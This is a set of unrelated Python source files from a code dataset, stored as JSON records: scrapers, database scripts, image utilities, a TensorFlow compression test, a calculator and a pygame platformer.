Proxyip\n\nLOG = logging.getLogger(__name__)\n\ndef model_query(model, *args, **kwargs):\n session = kwargs.get('session') or get_session()\n read_deleted = kwargs.get('read_deleted') or 'no'\n\n query = session.query(model, *args)\n\n if read_deleted == 'no':\n query = query.filter_by(deleted=0)\n elif read_deleted == 'yes':\n pass # omit the filter to include deleted and active\n elif read_deleted == 'only':\n query = query.filter_by(deleted=1)\n else:\n raise Exception(\n _(\"Unrecognized read_deleted value '%s'\") % read_deleted)\n return query\n\n\ndef create_ip(ip):\n try:\n ip.save()\n except Exception as e:\n LOG.error(e)\n\n\ndef update_ip(ip):\n ip.save()\n\ndef count():\n result = model_query(Proxyip).count()\n return result\n\ndef query_all(offset=0,limit=10):\n result = model_query(Proxyip).offset(offset).limit(limit).all()\n return result\n\ndef query_by_ip_port(ip,port):\n result = model_query(Proxyip).filter_by(ip=ip,port=port).first()\n return result\n \n","sub_path":"proxyip/model/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160213721","text":"# -*- coding:utf-8 -*-\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom scrapy.spider import Spider\nfrom scrapy.http import Request\nfrom scrapy.http import FormRequest\nimport logging\nfrom scrapy.utils.project import get_project_settings\nfrom crawler.common.util import Util\nfrom crawler.items import EpisodeItem, UserItem\nfrom crawler.db.db_mgr import DbManager\nfrom datetime import datetime\nimport traceback\nimport re\nimport json\n\nclass QqCatSpider(Spider):\n name = \"qq_cat\"\n pipelines = ['MysqlStorePipeline']\n spider_id = \"4194304\"\n site_id = \"16\"\n format_id = 2\n mgr = DbManager.instance()\n\n def __init__(self, *args, **kwargs):\n super(QqCatSpider, self).__init__(*args, **kwargs)\n cat_urls = kwargs.get('cats')\n if cat_urls:\n cat_urls = json.loads(cat_urls)\n else:\n cat_urls = self.mgr.get_cat_url('qq')\n if cat_urls:\n self._cat_urls = cat_urls\n else:\n self._cat_urls = []\n\n def start_requests(self):\n try:\n items = []\n for cat in self._cat_urls:\n items.append(Request(url=cat['url'], callback=self.parse_page, meta={'cat_id': cat['id'], 'cat_name': cat['cat_name'], 'audit': cat['audit'], 'priority': cat['priority']}))\n url = cat.pop('url')\n r = Request(url=url, callback=self.parse_page)\n r.meta.update({'cat': cat})\n items.append(r)\n return items\n except Exception as e:\n logging.log(logging.ERROR, traceback.format_exc())\n\n def parse_page(self, response):\n try:\n logging.log(logging.INFO, 'page:%s' % response.request.url)\n cat = response.request.meta['cat']\n items = []\n\n qq_v = response.xpath('//div[@class=\"mod_cont\"]/ul/li')\n for v in qq_v:\n urls = v.xpath('./h6/a/@href').extract()\n titles = v.xpath('./h6/a/@text').extract()\n thumb_urls = v.xpath('./a/img/@src').extract()\n durations = v.xpath('./a/div/span[@class=\"mod_version\"]/text()').extract()\n playeds = v.xpath('./p/span/text()').extract()\n\n title = titles[0] if titles else None\n thumb_url = thumb_urls[0] if thumb_urls else None\n duration = Util.get_qq_duration(durations[0]) if durations else None\n played = Util.normalize_played(Util.normalize_vp(playeds[0])) if playeds else None\n if urls:\n r = Request(url=urls[0], callback=self.parse_episode)\n d = {'title': title, 'thumb_url': thumb_url, 'duration': duration,'played': played}\n d.update(order)\n r.meta.update({'order': d})\n items.append(r)\n return items\n except Exception as e:\n logging.log(logging.ERROR, traceback.format_exc())\n\n def parse_episode(self, response):\n try:\n logging.log(logging.INFO, 'episode:%s' % response.request.url)\n order = response.request.meta['order']\n items = []\n\n #video info\n #tags = response.xpath('//p[@class=\"info_tags\"]//a/@title').extract()\n #descriptions = response.xpath('//div[@class=\"info_summary cf\"]/span/text()').extract()\n\n ep_item = EpisodeItem()\n ep_item['show_id'] = Util.get_qq_showid(response.request.url)\n #if tags:\n # ep_item['tag'] = Util.unquote(tags[0]).rstrip('|')\n #if descriptions:\n # ep_item['description'] = descriptions[0]\n for k, v in order.items():\n if k == 'user':\n ep_item['category'] = v\n elif k == 'show_id':\n ep_item['owner_show_id'] = v\n else:\n ep_item[k] = v\n\n ep_item['spider_id'] = self.spider_id\n ep_item['site_id'] = self.site_id\n ep_item['url'] = response.request.url\n ep_item['format_id'] = self.format_id\n items.append(ep_item)\n\n return items\n except Exception as e:\n logging.log(logging.ERROR, traceback.format_exc())\n\n","sub_path":"crawler/crawler/crawler/spiders/qq_cat.py","file_name":"qq_cat.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"115427184","text":"from secret import RequestLinkRestaurant,RequestLinkMealDelivery,RequestLinkMealTakeaway,RequestLinkBar,RequestLinkCafe, MongoURI\nimport requests\nimport json\nfrom pymongo import MongoClient\nclient = MongoClient(MongoURI)\ndb = client['ciborestaurants']\ncollection = db['ScriptTest']\n\nplacesR = requests.request('GET', RequestLinkRestaurant)\nplacesR = json.loads(placesR.text)\nplacesR = placesR[\"results\"]\n\nplacesMD = requests.request('GET', RequestLinkMealDelivery)\nplacesMD = json.loads(placesMD.text)\nplacesMD = placesMD[\"results\"]\n\nplacesMT = requests.request('GET', RequestLinkMealTakeaway)\nplacesMT = json.loads(placesMT.text)\nplacesMT = placesMT[\"results\"]\n\nplacesB = requests.request('GET', RequestLinkBar)\nplacesB = json.loads(placesB.text)\nplacesB = placesB[\"results\"]\n\nplacesC = requests.request('GET', RequestLinkCafe)\nplacesC = json.loads(placesC.text)\nplacesC = placesC[\"results\"]\n\n\nposts = db.Catalog\nfor i in range(len(placesR)):\n placesR[i].pop('types',None)\n placesR[i].pop('scope',None)\n placesR[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesR[i]).inserted_id\n print(placesR[i]['name'])\n print(post_id)\n\nfor i in range(len(placesMD)):\n placesMD[i].pop('types',None)\n placesMD[i].pop('scope',None)\n placesMD[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesMD[i]).inserted_id\n print(placesMD[i]['name'])\n print(post_id)\n\nfor i in range(len(placesMT)):\n placesMT[i].pop('types',None)\n placesMT[i].pop('scope',None)\n placesMT[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesMT[i]).inserted_id\n print(placesMT[i]['name'])\n print(post_id)\n\nfor i in range(len(placesB)):\n placesB[i].pop('types',None)\n placesB[i].pop('scope',None)\n placesB[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesB[i]).inserted_id\n print(placesB[i]['name'])\n print(post_id)\n\nfor i in range(len(placesC)):\n placesC[i].pop('types',None)\n placesC[i].pop('scope',None)\n placesC[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesC[i]).inserted_id\n print(placesC[i]['name'])\n print(post_id) ","sub_path":"scripts/getRestaurantsList.py","file_name":"getRestaurantsList.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"406635448","text":"from dcim.models import Site\nfrom ipam.models import VLANGroup\nfrom extras.models import CustomField, CustomFieldValue\nfrom ruamel.yaml import YAML\n\nfrom pathlib import Path\nimport sys\n\nfile = Path('/opt/netbox/initializers/vlan_groups.yml')\nif not file.is_file():\n sys.exit()\n\nwith file.open('r') as stream:\n yaml = YAML(typ='safe')\n vlan_groups = yaml.load(stream)\n\n optional_assocs = {\n 'site': (Site, 'name')\n }\n\n if vlan_groups is not None:\n for params in vlan_groups:\n custom_fields = params.pop('custom_fields', None)\n\n for assoc, details in optional_assocs.items():\n if assoc in params:\n model, field = details\n query = { field: params.pop(assoc) }\n\n params[assoc] = model.objects.get(**query)\n\n vlan_group, created = VLANGroup.objects.get_or_create(**params)\n\n if created:\n if custom_fields is not None:\n for cf_name, cf_value in custom_fields.items():\n custom_field = CustomField.objects.get(name=cf_name)\n custom_field_value = CustomFieldValue.objects.create(\n field=custom_field,\n obj=vlan_group,\n value=cf_value\n )\n\n vlan_group.custom_field_values.add(custom_field_value)\n\n print(\"🏘️ Created VLAN Group\", vlan_group.name)\n","sub_path":"startup_scripts/200_vlan_groups.py","file_name":"200_vlan_groups.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"120484975","text":"import numpy as np\nimport base64\nimport sys\nsys.path.append('.')\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef rgbdFromRequest(r):\n img_rgb = rgbFromRequest(r)\n depth_str = r['d']\n intr = r['intr']\n d_buff = base64.b64decode(depth_str)\n nparr_depth = np.frombuffer(d_buff, np.float32)\n nparr_depth = np.reshape(nparr_depth, (intr[\"height\"], intr[\"width\"]))\n return img_rgb, nparr_depth\n\ndef dFromRequest(r):\n depth_str = r['d']\n intr = r['intr']\n d_buff = base64.b64decode(depth_str)\n nparr_depth = np.frombuffer(d_buff, np.float32)\n nparr_depth = np.reshape(nparr_depth, (intr[\"height\"], intr[\"width\"]))\n return nparr_depth\n\n\ndef rgbdSegmaskFromRequest(r):\n img, d = rgbdFromRequest(r)\n intr = r['intr']\n s_str = r['segmask']\n s_buff = base64.b64decode(s_str)\n nparr_s = np.frombuffer(s_buff, np.uint8)\n nparr_s = np.reshape(nparr_s, (intr['height'], intr['width']))\n return img, d, nparr_s\n\n\ndef rgbFromRequest(r):\n rgb_str = r['rgb']\n encoded = r['encoded']\n intr = r['intr']\n rgb_buff = base64.b64decode(rgb_str)\n nparr_rgb = np.frombuffer(rgb_buff, np.uint8)\n if encoded:\n img_rgb = cv2.imdecode(nparr_rgb, cv2.IMREAD_COLOR)\n else:\n img_rgb = np.reshape(nparr_rgb, (intr[\"height\"], intr[\"width\"], 3))\n return img_rgb\n\n\n\ndef plotImage(img, filename=\"image.png\"):\n plt.figure()\n plt.imshow(img)\n plt.savefig(filename)","sub_path":"webserver/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152940949","text":"import os\n\niteritems = lambda d, *args, **kwargs: iter(d.items(*args, **kwargs))\n\n\ndef _find_common_roots(paths):\n \"\"\"Out of some paths it finds the common roots that need monitoring.\"\"\"\n paths = [x.split(os.path.sep) for x in paths]\n import pdb; pdb.set_trace()\n root = {}\n for chunks in sorted(paths, key=len, reverse=True):\n print('root {}'.format(root))\n node = root\n print('chunks {}'.format(chunks))\n for chunk in chunks:\n node = node.setdefault(chunk, {})\n print('node in loop {}'.format(node))\n node.clear()\n print('node = {}'.format(node))\n print('root = {}'.format(root))\n\n rv = set()\n\n def _walk(node, path):\n for prefix, child in iteritems(node):\n _walk(child, path + (prefix,))\n if not node:\n rv.add('/'.join(path))\n _walk(root, ())\n return rv\n\n\nprint(_find_common_roots(['/home/ye/test', '/home/ye/test/1']))","sub_path":"daily/04_29_18_common_roots.py","file_name":"04_29_18_common_roots.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"299439428","text":"import win32gui, win32api, win32con,win32process,psutil\nclass windowOperate(object):\n @staticmethod\n def click_position(hwd, x_position, y_position):\n long_position = win32api.MAKELONG(x_position, y_position)\n win32api.PostMessage(hwd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, long_position)\n win32api.PostMessage(hwd, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, long_position)\n\n @staticmethod\n def get_handle_by_process_id(pid):\n def callback(hwnd, hwnds):\n if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):\n _, nID = win32process.GetWindowThreadProcessId(hwnd)\n if nID == pid:\n hwnds.append(hwnd)\n return True\n\n results = []\n win32gui.EnumWindows(callback, results)\n if results:\n return results[0]\n else:\n return None\n\n @staticmethod\n def getPidByName(Str):\n pidList = []\n for pid in psutil.process_iter():\n if pid.name() == Str:\n pidList.append(pid.pid)\n return pidList\n\n @staticmethod\n def get_handle_by_process_name(processname):\n pids = windowOperate.getPidByName(processname)\n if pids:\n return windowOperate.get_handle_by_process_id(pids[0])\n else:\n return None","sub_path":"src/util/proxyAgent/windowOperate.py","file_name":"windowOperate.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"382408304","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#\n# Simple XML parser for the RSS channel from BarraPunto\n# Jesus M. Gonzalez-Barahona\n# jgb @ gsyc.es\n# TSAI and SAT subjects (Universidad Rey Juan Carlos)\n# September 2009\n#\n# Just prints the news (and urls) in BarraPunto.com,\n# after reading the corresponding RSS channel.\n\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nimport sys\nimport urllib.request\n\n\n# Para ejecutarlo:\n# python2.7 xml-parser-barrapunto.py >barrapunto.html\n# lo ultimo es para que la salida estandar la guarde\n# en un fichero\n\nclass myContentHandler(ContentHandler):\n texto = \"\"\n \n def __init__(self):\n self.texto += \"\"\n self.inItem = False\n self.inContent = False\n self.theContent = \"\"\n\n def startElement(self, name, attrs):\n if name == 'item':\n self.inItem = True\n elif self.inItem:\n if name == 'title':\n self.inContent = True\n elif name == 'link':\n self.inContent = True\n\n def endElement(self, name):\n if name == 'item':\n self.inItem = False\n elif self.inItem:\n if name == 'title':\n self.texto += (\"

Title: \" + self.theContent + \".

\")\n # To avoid Unicode trouble\n self.inContent = False\n self.theContent = \"\"\n elif name == 'link':\n self.texto += (\"

Link: \" + \"\" + self.theContent + \"

\")\n self.inContent = False\n self.theContent = \"\"\n\n def characters(self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n","sub_path":"Version_1/xml_parser_barrapunto.py","file_name":"xml_parser_barrapunto.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"569635051","text":"#A reference type is a variable where we store the reference to where\n#the variable is stored in the computer, not the value\n\ndef doThis(a):\n\ta = a + 1\n\n\ndef doThat(a):\n\ta = a + 1\n\treturn a\n\ndef doSomething(nums):\n\tnums[0] = 999\n\nvalue = 1 \t#This is a pimative type int. All programming languages deal\n\t\t\t#with primative types the same way. \nprint(\"Before Function: \",value)\ndoThis(value)\nprint(\"After Function: \",value)\nprint(\"********************\")\n#Value does change because it is a primative type. W e are making a dulplicate\n#that we pass to the function. The only way for that change to carray\n#over is to pass the value back\nvalue1 = 1\nprint(\"Before Function: \",value1)\nvalue1 = doThat(value1)\nprint(\"After Function: \",value1)\n\n\nlist = [1,2,3]\nlist2 = list\nprint(list)\nlist[0] = 100\nprint(list2)\nprint(\"Before Function: \",list)\ndoSomething(list)\nprint(\"After Function: \",list)\n\n","sub_path":"In Class Files/ReferenceTypeExplained.py","file_name":"ReferenceTypeExplained.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414608473","text":"print('''1 To 'Add' two numbers \n2 To 'Subtract' two numbers \n3 For 'Multiplication' of two numbers \n4 For Division''')\n\nct=True\nwhile ct == True:\n\tch=int(input(\"Enter your choice: \"))\n\tif ch>4:\n\t\tprint(\"invalid choice\")\n\telse:\n\t\tx=int(input(\"Enter your first no: \"))\n\t\ty=int(input(\"Enter the second no: \"))\n\t\tif ch == 1:\n\t\t\tprint(\"The Addition of both the no.s is : \",x+y)\n\t\t\t\n\t\telif ch== 2:\n\t\t\tprint(\"The subtraction of the no.s is : \",x-y)\n\t\t\t\n\t\telif ch == 3:\n\t\t \tprint(\"The multiplication of two no.s is : \",x*y)\n\t\t \n\t\telif ch == 4:\n\t\t\tprint(\" Dividing 1st no. by 2nd no. : \",x/y)\n\t\t\t\n\t\ta=input(\"do you wish to continue to calculate?type(yes/no)\")\n\t\tif a=='yes':\n\t\t\tct=True\n\t\telse:\n\t\t\tct=False\n\t\t\n\n\n\n","sub_path":"calci1.py","file_name":"calci1.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"140913105","text":"# Copyright 2022 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for EPR algorithm.\"\"\"\n\nimport os\nimport shutil\nfrom absl.testing import parameterized\nimport tensorflow as tf\nfrom tensorflow_model_optimization.python.core.common.keras.compression.algorithms import epr\n\n\ndef build_model():\n inputs = tf.keras.layers.Input(shape=(28, 28), name=\"input\")\n x = tf.keras.layers.Reshape((28, 28, 1))(inputs)\n x = tf.keras.layers.Conv2D(\n 20, 5, use_bias=True, activation=\"relu\", padding=\"valid\", name=\"conv1\")(x)\n x = tf.keras.layers.MaxPool2D(2, 2)(x)\n x = tf.keras.layers.Conv2D(\n 50, 5, use_bias=True, activation=\"relu\", padding=\"valid\", name=\"conv2\")(x)\n x = tf.keras.layers.MaxPool2D(2, 2)(x)\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(\n 500, use_bias=True, activation=\"relu\", name=\"fc1\")(x)\n outputs = tf.keras.layers.Dense(\n 10, use_bias=True, name=\"fc2\")(x)\n return tf.keras.Model(inputs=[inputs], outputs=[outputs])\n\n\ndef get_dataset():\n (x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n x_train = (x_train / 255).astype(\"float32\")\n x_test = (x_test / 255).astype(\"float32\")\n return (x_train, y_train), (x_test, y_test)\n\n\ndef train_model(model):\n model.compile(\n optimizer=tf.keras.optimizers.Adam(1e-2),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"accuracy\")],\n )\n (x_train, y_train), _ = get_dataset()\n model.fit(x_train, y_train, batch_size=128, epochs=3)\n\n\ndef evaluate_model(model):\n model.compile(\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"accuracy\")],\n )\n _, (x_test, y_test) = get_dataset()\n results = model.evaluate(x_test, y_test, batch_size=128, return_dict=True)\n return results[\"accuracy\"]\n\n\ndef train_and_compress_model():\n model = build_model()\n algorithm = epr.EPR(entropy_penalty=10.)\n training_model = algorithm.get_training_model(model)\n train_model(training_model)\n compressed_model = algorithm.compress_model(training_model)\n return model, training_model, compressed_model\n\n\ndef get_weight_size_in_bytes(weight):\n if weight.dtype == tf.string:\n return tf.reduce_sum(tf.strings.length(weight, unit=\"BYTE\"))\n else:\n return tf.size(weight) * weight.dtype.size\n\n\ndef zip_directory(dir_name):\n return shutil.make_archive(dir_name, \"zip\", dir_name)\n\n\nclass EPRTest(parameterized.TestCase, tf.test.TestCase):\n\n def _save_models(self, model, compressed_model):\n model_dir = self.create_tempdir().full_path\n original_model_dir = os.path.join(model_dir, \"original\")\n compressed_model_dir = os.path.join(model_dir, \"compressed\")\n model.save(original_model_dir)\n compressed_model.save(compressed_model_dir)\n return original_model_dir, compressed_model_dir\n\n @parameterized.parameters([5], [2, 3], [3, 4, 2], [2, 3, 4, 1])\n def test_project_training_weights_has_gradients(self, *shape):\n algorithm = epr.EPR(entropy_penalty=1.)\n init = tf.ones(shape, dtype=tf.float32)\n algorithm.init_training_weights(init)\n layer = tf.keras.layers.Layer()\n for weight_repr in algorithm.weight_reprs:\n layer.add_weight(*weight_repr.args, **weight_repr.kwargs)\n with tf.GradientTape() as tape:\n weight = algorithm.project_training_weights(*layer.weights)\n gradients = tape.gradient(weight, layer.weights)\n # Last weight is scale of prior. Should not have a gradient here.\n self.assertAllEqual(\n [g is not None for g in gradients],\n [w.dtype.is_floating for w in layer.weights[:-1]] + [False])\n\n @parameterized.parameters([5], [2, 3], [3, 4, 2], [2, 3, 4, 1])\n def test_compute_entropy_has_gradients(self, *shape):\n algorithm = epr.EPR(entropy_penalty=1.)\n init = tf.ones(shape, dtype=tf.float32)\n algorithm.init_training_weights(init)\n layer = tf.keras.layers.Layer()\n for weight_repr in algorithm.weight_reprs:\n layer.add_weight(*weight_repr.args, **weight_repr.kwargs)\n with tf.GradientTape() as tape:\n loss = algorithm.compute_entropy(*layer.weights)\n gradients = tape.gradient(loss, layer.weights)\n self.assertAllEqual(\n [g is not None for g in gradients],\n [w.dtype.is_floating for w in layer.weights])\n\n @parameterized.parameters([5], [2, 3], [3, 4, 2], [2, 3, 4, 1])\n def test_train_and_test_weights_are_equal(self, *shape):\n algorithm = epr.EPR(entropy_penalty=1.)\n init = tf.random.uniform(shape, dtype=tf.float32)\n algorithm.init_training_weights(init)\n layer = tf.keras.layers.Layer()\n for weight_repr in algorithm.weight_reprs:\n layer.add_weight(*weight_repr.args, **weight_repr.kwargs)\n train_weight = algorithm.project_training_weights(*layer.weights)\n compressed_weights = algorithm.compress_training_weights(*layer.weights)\n test_weight = algorithm.decompress_weights(*compressed_weights)\n self.assertAllEqual(train_weight, test_weight)\n\n def test_reduces_model_size_at_reasonable_accuracy(self):\n model, _, compressed_model = train_and_compress_model()\n original_model_dir, compressed_model_dir = self._save_models(\n model, compressed_model)\n\n with self.subTest(\"compressed_weights_are_smaller\"):\n original_size = sum(\n map(get_weight_size_in_bytes, model.weights)).numpy()\n compressed_size = sum(\n map(get_weight_size_in_bytes, compressed_model.weights)).numpy()\n self.assertLess(compressed_size, 0.01 * original_size)\n\n with self.subTest(\"zip_compressed_model_is_smaller\"):\n original_zipfile = zip_directory(original_model_dir)\n compressed_zipfile = zip_directory(compressed_model_dir)\n original_size = os.path.getsize(original_zipfile)\n compressed_size = os.path.getsize(compressed_zipfile)\n # TODO(jballe): There is a lot of overhead in the saved function graphs\n # (saved_model.pb), which is especially severe for small models like this\n # one. The function graph is several times larger than the weights. Can we\n # save some space by only saving the function graph of the main call(),\n # rather than of each layer?\n self.assertLess(compressed_size, 0.2 * original_size)\n\n with self.subTest(\"has_reasonable_accuracy\"):\n compressed_model = tf.keras.models.load_model(compressed_model_dir)\n accuracy = evaluate_model(compressed_model)\n self.assertGreater(accuracy, .9)\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","sub_path":"tensorflow_model_optimization/python/core/common/keras/compression/algorithms/epr_test.py","file_name":"epr_test.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108895345","text":"import os\r\nimport sys\r\nimport pygame\r\nfrom other_sprites import *\r\nfrom helping_functions import *\r\nfrom player import *\r\nfrom time import sleep\r\n\r\n\r\nSCREEN_WIDTH = 1250\r\nSCREEN_HEIGHT = 850\r\nSYMB_FOR_SPARE_PLACE_IN_LEVEl_FILE = '.'\r\n\r\n# загрузка уровня\r\ndef load_level(filename):\r\n filename = os.path.join(\"data\", filename)\r\n with open(filename, 'r') as mapFile:\r\n level_map = [line.strip() for line in mapFile]\r\n max_width = max(map(len, level_map))\r\n return list(map(lambda x: x.ljust(max_width,\r\n SYMB_FOR_SPARE_PLACE_IN_LEVEl_FILE),\r\n level_map))\r\n\r\n# Функция, заканчивающая игру\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit(0)\r\n \r\n \r\nclass Main:\r\n def __init__(self):\r\n pygame.init()\r\n self.width = SCREEN_WIDTH\r\n self.height = SCREEN_HEIGHT\r\n self.size = (self.width, self.height)\r\n self.screen = pygame.display.set_mode(self.size)\r\n self.fps = FPS\r\n self.clock = pygame.time.Clock()\r\n\r\n if self.start_screen():\r\n if self.start_game():\r\n self.end_screen()\r\n # Заставка\r\n def start_screen(self):\r\n intro_text = [\"ЗАСТАВКА\", \"\", \"Правила игры\", \"\", \"True\"]\r\n \r\n background = pygame.transform.scale(load_image(START_BACKGROUND),\r\n (self.width, self.height))\r\n self.screen.blit(background, (0, 0))\r\n font = pygame.font.Font(None, 30)\r\n text_coord = 50\r\n for line in intro_text:\r\n string_rendered = font.render(line, 1, pygame.Color('black'))\r\n intro_rect = string_rendered.get_rect()\r\n text_coord += 10\r\n intro_rect.top = text_coord\r\n intro_rect.x = 10\r\n text_coord += intro_rect.height\r\n self.screen.blit(string_rendered, intro_rect)\r\n \r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n elif event.type == pygame.KEYDOWN or \\\r\n event.type == pygame.MOUSEBUTTONDOWN:\r\n return True\r\n pygame.display.flip()\r\n self.clock.tick(10)\r\n \r\n # Экран конца игры\r\n def end_screen(self):\r\n end_text = [\"Конец\", 'Вы победили',\r\n \"Нажмите любую кнопку,\", \"чтобы выйти\"]\r\n\r\n background = pygame.transform.scale(load_image(END_BACKGROUND),\r\n (self.width, self.height))\r\n self.screen.blit(background, (0, 0))\r\n font = pygame.font.Font(None, 20)\r\n text_coord = 200\r\n for line in end_text:\r\n string_rendered = font.render(line, 1, pygame.Color('red'))\r\n intro_rect = string_rendered.get_rect()\r\n text_coord += 10\r\n intro_rect.top = text_coord\r\n intro_rect.x = 10\r\n text_coord += intro_rect.height\r\n self.screen.blit(string_rendered, intro_rect)\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or \\\r\n event.type == pygame.KEYDOWN or \\\r\n event.type == pygame.MOUSEBUTTONDOWN:\r\n terminate()\r\n pygame.display.flip()\r\n self.clock.tick(10)\r\n\r\n # Сама игра\r\n def start_game(self):\r\n background_group = pygame.sprite.Group()\r\n all_sprites = pygame.sprite.LayeredUpdates() \r\n player_group = pygame.sprite.GroupSingle()\r\n bullet_group = pygame.sprite.Group() \r\n platforms_group = pygame.sprite.Group()\r\n fire_group = pygame.sprite.Group()\r\n enemy_group = pygame.sprite.Group()\r\n save_group = pygame.sprite.Group()\r\n end_group = pygame.sprite.Group()\r\n groups_to_update_with_camera = [player_group, platforms_group, \r\n bullet_group, fire_group, enemy_group, \r\n save_group, end_group] \r\n \r\n bck = Background(background_group)\r\n all_sprites.add(bck, layer=-1)\r\n\r\n level = load_level(\"level5.txt\")\r\n player = checkpoint = start_checkpoint = None\r\n camera = Camera(groups_to_update_with_camera)\r\n for y in range(len(level)):\r\n for x in range(len(level[y])):\r\n if level[y][x] == SYMB_FOR_PLATFORM_IN_LEVEL_FILE:\r\n plt = Platform((x, y), platforms_group)\r\n all_sprites.add(plt, layer=0)\r\n \r\n elif level[y][x] == SYMB_FOR_FIRE_IN_LEVEL_FILE:\r\n fire = Fire((x, y), fire_group)\r\n all_sprites.add(fire, layer=1)\r\n \r\n elif level[y][x] == SYMB_FOR_PLAYER_IN_LEVEL_FILE:\r\n start_checkpoint = Checkpoint_Tile((x, y), save_group)\r\n player = Player((x, y), player_group)\r\n all_sprites.add(player, layer=2)\r\n player.groups = player.groups() \r\n \r\n elif level[y][x] == 's':\r\n snail = Snail((x, y - 0.70), enemy_group)\r\n all_sprites.add(snail, layer=2) \r\n \r\n elif level[y][x] == 'R':\r\n robot = Robot((x, y), enemy_group)\r\n all_sprites.add(robot, layer=2) \r\n \r\n elif level[y][x] == 'S':\r\n checkpoint = Checkpoint_Tile((x, y), save_group)\r\n all_sprites.add(checkpoint, layer=1)\r\n\r\n elif level[y][x] == 'E':\r\n end = End_tile((x, y), end_group)\r\n all_sprites.add(end, layer=2)\r\n\r\n left, right, up = False, False, False\r\n actions_list = [left, right, up]\r\n checkpoint = start_checkpoint\r\n \r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n # Сигналы, получаемые от игрока \r\n if event.type == pygame.KEYDOWN:\r\n if event.key in DCT_FOR_MOVING_PLAYER.keys():\r\n actions_list[DCT_FOR_MOVING_PLAYER[event.key]] = True\r\n elif event.key == pygame.K_SPACE: \r\n player.shoot(bullet_group, all_sprites) \r\n \r\n if event.type == pygame.KEYUP:\r\n if event.key in DCT_FOR_MOVING_PLAYER.keys():\r\n actions_list[DCT_FOR_MOVING_PLAYER[event.key]] = False\r\n \r\n for enemy in enemy_group:\r\n if enemy.image_name != 'robot.png':\r\n enemy.move()\r\n else:\r\n enemy.move(bullet_group, all_sprites)\r\n # Возвращение экрана к дефолту\r\n 